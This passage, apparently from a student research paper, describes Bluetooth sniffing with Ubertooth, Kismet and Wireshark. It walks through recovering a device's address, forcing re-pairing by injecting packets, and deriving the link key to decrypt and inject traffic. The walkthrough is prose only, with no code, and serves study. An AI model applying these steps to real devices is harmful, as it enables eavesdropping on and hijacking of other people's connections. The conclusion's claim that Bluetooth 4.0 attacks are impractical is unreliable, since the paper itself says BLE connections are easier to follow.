new link key. For a BLE connection the third obstacle largely disappears: the hopping sequence
does not depend on the address but on the hop increment and channel map sent in the clear in the
connection request, so an attacker that captures the connection request on an advertising channel
(or recovers the access address, CRC initialiser, hop interval and hop increment from data packets,
as Ubertooth's BLE firmware can) can follow the whole connection. The following paragraphs
describe one way the Classic attack can be done.

Bluetooth packets can be picked up from the air using a passive Bluetooth device
such as Ubertooth. This is an open-source piece of hardware that can be purchased fully
assembled for around $100 online or built from scratch for around $35 (do-it-yourself); the
design files can be found on the Ubertooth website. Ubertooth uses a radio with the
same modulation scheme as Bluetooth, which enables it both to pick up packets from the air
and to inject new packets. Sniffed packets are parsed to extract the LAP portion of the device
address (its lower 24 bits, which form the sync word of every Classic packet) using Ubertooth's
firmware.

Figure 5: LAP portion of the MAC can be extracted from sniffed packet using Ubertooth.

Once we have captured some Bluetooth packets, we can use a Kismet plug-in to examine the
contents further. Kismet is an 802.11 network monitoring tool with sniffing capabilities, and its
Ubertooth plug-in extends it to Bluetooth. Using this tool we can analyse multiple packet
characteristics, such as the header error check (whose initial value is the UAP) and timing across
packets, to determine the UAP portion of the address. Kismet can write a pcap file with the
Bluetooth baseband link type containing the decoded packets, which Wireshark can read using the
plug-in distributed with libbtbb. Using Wireshark we can completely dissect the packets once we
have the link key.

Figure 6: UAP can be extracted by examining packets further using Kismet.

The final step in determining the complete address is finding the NAP portion. One way of
doing that is through elimination. The NAP together with the UAP forms the 24-bit
Organizationally Unique Identifier (OUI) of the vendor, so only OUIs whose lowest byte equals the
UAP we found are candidates; the upper byte of the NAP is very often 0x00, and the OUI list maps
the remaining candidates to vendors, which, combined with what we know about the device, narrows
the list down even further. Finally, a brute-force attack can be applied to the remaining
candidates by sending a connection request (paging) to the device with each guessed address.

Figure 7: Breakdown of the three parts of MAC address

With knowledge of the entire address we can determine the hopping sequence.
Now we can try to make the two devices re-pair by injecting pairing-request
packets, to convince one of them that the other has lost the link key. If this works and
re-pairing is initiated, we can capture all the packets in the pairing sequence now that
we know the hopping pattern. With the complete set of pairing packets in hand, we can
compute the link key and use it to decrypt sniffed packets and to encrypt packets to inject into
the link. A successful implementation of this attack affects even devices in Non-Discoverable
mode, since we know the address and can communicate directly with the device without it ever
broadcasting its own address.

V. CONCLUSION/WHAT I LEARNED
Doing this research paper helped me better understand Bluetooth in general. I took an in-depth
look at the protocol stack to learn how each component works and how it interacts with the
rest of the protocol stack. I also found several implementations of BLE in ways I was unfamiliar
with, and it got me thinking about what other ways I could potentially use this for. I feel
better prepared to create a tablet/smartphone app that takes advantage of the BLE application
profiles now that I know how they work. Lastly, I did a thorough investigation of the existing
tools and techniques used to sniff Bluetooth traffic. I understand the differences between the tools
and what each of those tools does to exploit the Bluetooth protocol. Now my understanding of
those exploits goes beyond simply running the tool; I know what is happening in the back end
to make it all happen. Bluetooth 4.0 is a highly secure protocol and the vulnerability should not
deter anyone from developing applications that use it, since executing a successful attack is
extremely difficult and impractical.
My project presentation can be found at: http://youtu.be/O8h6T7g25jE

References
1. "Taming the Blue Beast: A Survey of Bluetooth-Based Threats", IEEE Security & Privacy, March/April 2010;
http://home.engineering.iastate.edu/~gamari/CprE537_S13/docs/BluetoothSec.pdf
2. Project Ubertooth, http://ubertooth.sourceforge.net/
3. Dominic Spill and Andrea Bittau, "BlueSniff: Eve meets Alice and Bluetooth", USENIX WOOT 2007;
http://static.usenix.org/event/woot07/tech/full_papers/spill/spill.pdf
4. "FTS4BT Bluetooth Protocol Analyzer and Packet Sniffer", product data sheet, Frontline
Test Equipment, 2010; www.fte.com/products/FTS4BT.aspx
5. Kismet, http://www.kismetwireless.net/
6. Bluetooth Special Interest Group, Specification | Adopted Documents,
https://www.bluetooth.org/en-us/specification/adopted-specifications
7. Joe Decuir, "Changing the Way the World Connects - Bluetooth 4.0: Low Energy", 2010;
http://chapters.comsoc.org/vancouver/BTLER3.pdf
8. Mikhail Galeev, "Bluetooth 4.0: An Introduction to Bluetooth Low Energy", EE Times, July 2011;
http://www.eetimes.com/design/communications-design/4217866/Bluetooth-4-0--Anintroduction-to-Bluetooth-Low-Energy-Part-I
9. A. Becker, "Bluetooth Security & Hacks", unpublished paper, 16 Aug. 2007;
http://gsyc.es/~anto/ubicuos2/bluetooth_security_and_hacks.pdf
